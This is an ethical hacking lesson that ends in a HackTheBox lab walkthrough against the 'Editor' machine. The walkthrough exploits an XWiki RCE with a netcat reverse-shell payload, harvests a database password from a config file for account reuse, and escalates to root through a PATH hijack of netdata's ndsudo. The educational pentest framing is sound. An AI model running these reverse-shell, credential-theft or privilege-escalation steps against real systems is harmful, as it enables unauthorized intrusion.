Ethical Hacking

Objectives: By the end of this topic, you will be able to…

  • Execute a basic pentest with a clear methodology
  • Use Kali Linux tools in each phase of ethical hacking
  • Document findings professionally
  • Act within a legal and ethical framework

What is ethical hacking?

Ethical hacking is the practice of assessing the security of computer systems in a controlled, legal way with explicit consent from the owner. The goal is to identify vulnerabilities before malicious actors exploit them.

An ethical hacker (pentester) simulates real attacks to strengthen security. Unlike malicious hackers (black hats), ethical hackers (white hats) act responsibly and professionally within a legal and ethical framework.

Aspect         | Ethical hacking                 | Malicious hacking
Intention      | Protect and improve security    | Personal gain
Legality       | With authorization              | Without consent
Documentation  | Requires a technical report     | Avoids leaving traces
Defined scope  | Yes, established by contract    | Does not respect boundaries
Consequences   | Security improvements           | Reputational, financial, or legal damage

Phases of ethical hacking

1. Reconnaissance

Collect information about the target without interacting with it directly: websites, domains, DNS records, technologies in use, email addresses, employee names, published credential leaks.

Common tools: whois, nslookup, theHarvester, Shodan, Maltego

2. Scanning and enumeration

Interact directly with the target to identify services, open ports, and attack vectors. Enumerate users, software versions, entry points.

Common tools: nmap, nikto, dirb, enum4linux

3. Exploitation

Use the identified vulnerabilities to gain access that the system's controls should have prevented. This phase demonstrates whether a finding is actually exploitable rather than theoretical.

Common tools: sqlmap, msfconsole, exploit-db, custom scripts

4. Post-exploitation

Assess the impact once inside the system: privileges obtained, data accessible, possibility of persistent access.

Possible activities: dumping passwords, lateral movement, extracting tokens or keys.

5. Reporting

Document all activities: vulnerabilities found, severity, evidence (screenshots, logs, commands), mitigation recommendations. Reports should be clear, technical, and reproducible.


Legal framework

Before any pentest activity, a signed legal agreement must define:

  • Scope: which systems are authorized, allowed times, depth of testing
  • Limitations: what is not permitted (e.g., no DoS)
  • Legal liability: damage limits, protection for the tester
  • Confidentiality: nondisclosure agreement (NDA)

Never perform a penetration test without a formal contract or agreement.


Recognized pentesting methodologies

PTES (Penetration Testing Execution Standard)

Comprehensive framework covering: pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.

OSSTMM (Open Source Security Testing Methodology Manual)

Broad, scientific approach covering human, physical, electronic, and process aspects. Defines zones of interaction and quantitative metrics.


Hands-on lab

Requirements: Kali Linux with HackTheBox VPN, machine “Editor”

Safety and ethics

  • Only attack machines you have explicit permission to test
  • Record your steps for reproducibility and grading
  • Use disposable VMs or containers to avoid damaging your host system

Part 0: Connect to HTB via OpenVPN

sudo openvpn --config ~/Downloads/HTB-yourvpn.ovpn

Verify with ip a (a tun0 interface should appear with a 10.10.x.x address) and ping 10.10.11.80.

Part 1: Reconnaissance with nmap

nmap -sC -sV -p- -oA editor_initial 10.10.11.80

-p- scans all 65535 TCP ports, so expect this to take a while; -oA writes three files (editor_initial.nmap, .gnmap, .xml) that you keep as evidence for the report. Interpret the output: SSH on 22, nginx on 80, Jetty/XWiki on 8080. Identify potential attack surfaces from the version strings and service configurations.
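The greppable file written by -oA is easy to turn into a findings list for the report and into the URLs you will feed to nikto and dirb in the next phase. The script below is an added example for this lesson, not part of the lab and not nmap code; SAMPLE_GNMAP is a constructed stand-in for editor_initial.gnmap with placeholder version strings, and parse_gnmap() accepts the real file just as well.

```python
"""Turn nmap greppable output (the .gnmap written by -oA) into a service list
and the base URLs worth passing to web enumeration tools.

Added example for this lesson; not part of the lab and not nmap code.
SAMPLE_GNMAP is constructed: version strings are placeholders, real output differs.
"""
from dataclasses import dataclass

SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated as: nmap -sC -sV -p- -oA editor_initial 10.10.11.80\n"
    "Host: 10.10.11.80 ()\tStatus: Up\n"
    "Host: 10.10.11.80 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu (Ubuntu Linux; protocol 2.0)/, "
    "80/open/tcp//http//nginx 1.18.0 (Ubuntu)/, 8080/open/tcp//http//Jetty/"
    "\tIgnored State: closed (65532)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)


@dataclass(frozen=True)
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str      # nmap service name, e.g. "http", or "ssl|http" when TLS-wrapped
    version: str   # -sV banner, may be empty


def parse_gnmap(text):
    """Parse every 'Host:' line that carries a 'Ports:' field.

    Each port entry is port/state/proto/owner/service/rpc/version/; nmap
    replaces any '/' inside a field with '|', so splitting on '/' is safe.
    """
    services = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = {}
        for chunk in line.split("\t"):          # fields are tab separated
            key, _, value = chunk.partition(": ")
            fields[key.strip()] = value.strip()
        host = fields["Host"].split(" ")[0]
        for entry in fields.get("Ports", "").split(", "):
            parts = entry.strip().split("/")
            if len(parts) < 7 or not parts[0].isdigit():
                continue
            port, state, proto, _owner, name, _rpc, version = parts[:7]
            services.append(Service(host, int(port), proto, state, name, version))
    return services


def open_services(services):
    """Only confirmed-open ports count as attack surface."""
    return [s for s in services if s.state == "open"]


def web_targets(services):
    """Base URLs for nikto/dirb from every HTTP-looking open port."""
    urls = []
    for s in open_services(services):
        if "http" not in s.name:
            continue
        scheme = "https" if s.name.startswith("ssl|") or s.name == "https" else "http"
        default = 443 if scheme == "https" else 80
        hostport = s.host if s.port == default else f"{s.host}:{s.port}"
        urls.append(f"{scheme}://{hostport}/")
    return urls


if __name__ == "__main__":
    import sys
    # Usage: python parse_gnmap.py editor_initial.gnmap   (falls back to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    for s in open_services(parse_gnmap(text)):
        print(f"{s.port}/{s.proto:<4} {s.name:<10} {s.version}")
    print("web targets:", *web_targets(parse_gnmap(text)))
```

Keep the parsed table in the report appendix next to the raw .gnmap: the reviewer can check every port claim against the evidence file.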

Part 2: Hostname resolution

sudo nano /etc/hosts
# add: 10.10.11.80    editor.htb

Part 3: Identify and exploit XWiki RCE

  1. Review the exploit PoC repository (read the code before running anything you downloaded):
git clone https://github.com/gunzf0x/CVE-2025-24893
cd CVE-2025-24893
  2. Prepare a listener on your attacking machine:
nc -lvnp 4444
  3. Trigger the exploit (replace <your-ip> with your tun0 address):
python CVE-2025-24893.py -t http://editor.htb:8080/ -c 'busybox nc <your-ip> 4444 -e /bin/bash'

Part 4: Post-exploitation — finding credentials

  1. Confirm who you are and where you landed:
id && whoami && hostname
grep -E 'xwiki|oliver' /etc/passwd
  2. Search for configuration files that may contain credentials:
find / -type f -name "hibernate.cfg.xml" 2>/dev/null
grep -in password /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml
  3. If the database password is reused for a local account, switch user with it. su must be run from a terminal, so upgrade the bare nc -e reverse shell to a pty first (for example with python3's pty module), otherwise su fails with "must be run from a terminal":
su oliver
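grep -i password also matches commented-out blocks and sample settings, so it pays to read the live configuration and the candidate accounts properly. The script below is an added example for this lesson, not part of the lab or of XWiki: both inputs are constructed stand-ins with placeholder values (the password here is not the lab's), and on the target you would read /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml and /etc/passwd instead.

```python
"""Extract the database credentials from a hibernate.cfg.xml and list the
local accounts the password might be reused on.

Added example for this lesson, not part of the lab or of XWiki. Both inputs
are constructed with placeholder values; read the real files on the target.
"""
import xml.etree.ElementTree as ET

SAMPLE_HIBERNATE_CFG = """<hibernate-configuration>
  <session-factory>
    <!-- a leftover block like this also matches 'grep -i password' but is not live config
    <property name="hibernate.connection.url">jdbc:postgresql://localhost/xwiki</property>
    <property name="hibernate.connection.password">old_placeholder</property>
    -->
    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">example_password</property>
    <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
  </session-factory>
</hibernate-configuration>
"""

# Constructed /etc/passwd excerpt (not the lab host's real file).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
xwiki:x:998:998::/var/lib/xwiki:/usr/sbin/nologin
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
oliver:x:1000:1000:oliver:/home/oliver:/bin/bash
netdata:x:999:999::/opt/netdata:/usr/sbin/nologin
"""

CREDENTIAL_KEYS = ("url", "username", "password")


def extract_db_credentials(xml_text):
    """Return {'url', 'username', 'password'} from live <property> elements.

    The XML parser drops comments, so commented-out credentials never
    pollute the result the way a grep would.
    """
    root = ET.fromstring(xml_text)
    creds = {}
    for prop in root.iter("property"):
        name = prop.get("name", "")
        prefix = "hibernate.connection."
        if not name.startswith(prefix):
            continue
        key = name[len(prefix):]
        if key in CREDENTIAL_KEYS:
            creds[key] = (prop.text or "").strip()
    return creds


def login_users(passwd_text):
    """Accounts that can actually log in: root and real users with an interactive shell."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, uid, _, _, _, shell = fields
        if shell.endswith(("nologin", "false")):
            continue
        if uid == "0" or int(uid) >= 1000:
            users.append(name)
    return users


def reuse_candidates(creds, passwd_text):
    """Accounts worth trying the harvested password against with su."""
    return [u for u in login_users(passwd_text) if u != creds.get("username")]


if __name__ == "__main__":
    creds = extract_db_credentials(SAMPLE_HIBERNATE_CFG)
    print("db user:", creds["username"], "url:", creds["url"])
    print("try password against:", ", ".join(reuse_candidates(creds, SAMPLE_PASSWD)))
```

Record the file path, the property name and the account you tested in the transcript; "password found in config" without those three details is not a reproducible finding.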

Part 5: Privilege escalation vectors

find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} \; 2>/dev/null
sudo -l

The parentheses matter: find's implicit -a binds tighter than -o, so without them the -exec only applies to the SGID branch and SUID files are silently dropped from the listing. Compare the result against the distribution's standard SUID/SGID set; anything under a third-party prefix deserves a closer look (e.g., ndsudo under /opt/netdata/).

Part 6: Exploiting CVE-2024-32019

  1. Compile the PoC on your attacking machine, for the target's architecture:
gcc poc.c -o nvme
  2. Transfer the binary to the target and exploit. ndsudo is SUID root and resolves the nvme tool by name through the caller's PATH, so a fake nvme placed first in PATH is what runs as root:
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
  3. Validate: in the resulting shell, whoami should return root.
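The whole of Part 6 rests on one design mistake: a privileged helper looking up a tool by bare name in an environment the caller controls. The simulation below is an added example for this lesson, not netdata's code and not the lab's poc.c. It plants a placeholder executable in a temporary directory and resolves the tool name three ways; the allow-list, FIXED_PATHS and SAFE_PATH are assumptions for the demo, not netdata's actual configuration.

```python
"""Why a PATH hijack against a privileged helper works, and two ways to close it.

Added example for this lesson; a Python simulation, not netdata's code and not
the lab's poc.c. The allow-list, FIXED_PATHS and SAFE_PATH are assumptions.
"""
import os
import shutil
import stat
import tempfile

# Assumed allow-list: the helper only runs approved tools, but by bare name.
ALLOWED_COMMANDS = {"nvme-list": ["nvme", "list"]}
# Hardened form 1: pre-approved absolute locations, PATH is never consulted.
FIXED_PATHS = {"nvme": ["/usr/sbin/nvme", "/usr/bin/nvme"]}
# Hardened form 2: a sanitized PATH without user-writable directories.
SAFE_PATH = os.pathsep.join(["/usr/sbin", "/usr/bin", "/sbin", "/bin"])


def resolve_via_path(name, path_env):
    """Vulnerable lookup: first executable called `name` along the given PATH."""
    return shutil.which(name, path=path_env)


def resolve_fixed(name):
    """Hardened lookup: a pre-approved absolute path, or nothing at all."""
    for candidate in FIXED_PATHS.get(name, []):
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def plant_fake_binary(directory, name):
    """Stand-in for the attacker's /tmp/nvme: any executable with the right name."""
    fake = os.path.join(directory, name)
    with open(fake, "w") as f:
        f.write("#!/bin/sh\nid\n")       # placeholder, not the setuid-shell PoC
    os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return fake


def demo(command="nvme-list"):
    """Resolve the tool three ways and report what each variant would execute."""
    tool = ALLOWED_COMMANDS[command][0]
    with tempfile.TemporaryDirectory(prefix="hijack-") as attacker_dir:
        fake = plant_fake_binary(attacker_dir, tool)
        # Same effect as `export PATH=/tmp:$PATH` before calling the helper.
        hijacked_path = attacker_dir + os.pathsep + SAFE_PATH
        return {
            "expected_fake": fake,
            "vulnerable": resolve_via_path(tool, hijacked_path),
            "sanitized_path": resolve_via_path(tool, SAFE_PATH),
            "fixed": resolve_fixed(tool),
        }


if __name__ == "__main__":
    for how, chosen in demo().items():
        print(f"{how:<15} -> {chosen}")
```

Note that resolve_fixed() returns None when the real tool is missing instead of falling back to PATH: a privileged helper should refuse to run rather than guess. The same reasoning explains why sudo resets PATH via secure_path.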

Cleanup

rm -f /tmp/nvme

Remove everything you placed on the target (the fake binary, any transferred scripts); the PATH change only lived in your shell session. Leaving tooling behind on a client system is a finding against you, not the client.

Submission

ZIP file containing:

  • PDF report (executive summary, methodology, prioritized findings, remediation guidance)
  • Raw commands transcript
  • Screenshots directory (named by step)
  • PoC directory with payloads and scripts used
  • One paragraph per vulnerability explaining why the exploit worked and one mitigation

Key concepts

Term             | Definition
Ethical hacking  | Authorized security assessment simulating real attacks
Pentesting       | Penetration testing following a structured methodology
Metasploit       | Exploitation framework for security assessments
Nmap             | Port scanning and service discovery tool
Reverse shell    | Connection initiated from the compromised system back to the attacker
PTES             | Standard that defines the phases of a professional pentest

Test yourself

  1. Methodology: Describe the five phases of ethical hacking and explain why the order is important. What happens if you skip directly to the exploitation phase?

  2. Legal: What elements should a pentest contract contain before starting any activity? Why is it critical to define the scope?

  3. Technical: In the lab, a reverse shell was used. Explain why an attacker prefers a reverse shell over a bind shell. What advantage does it offer against firewalls?

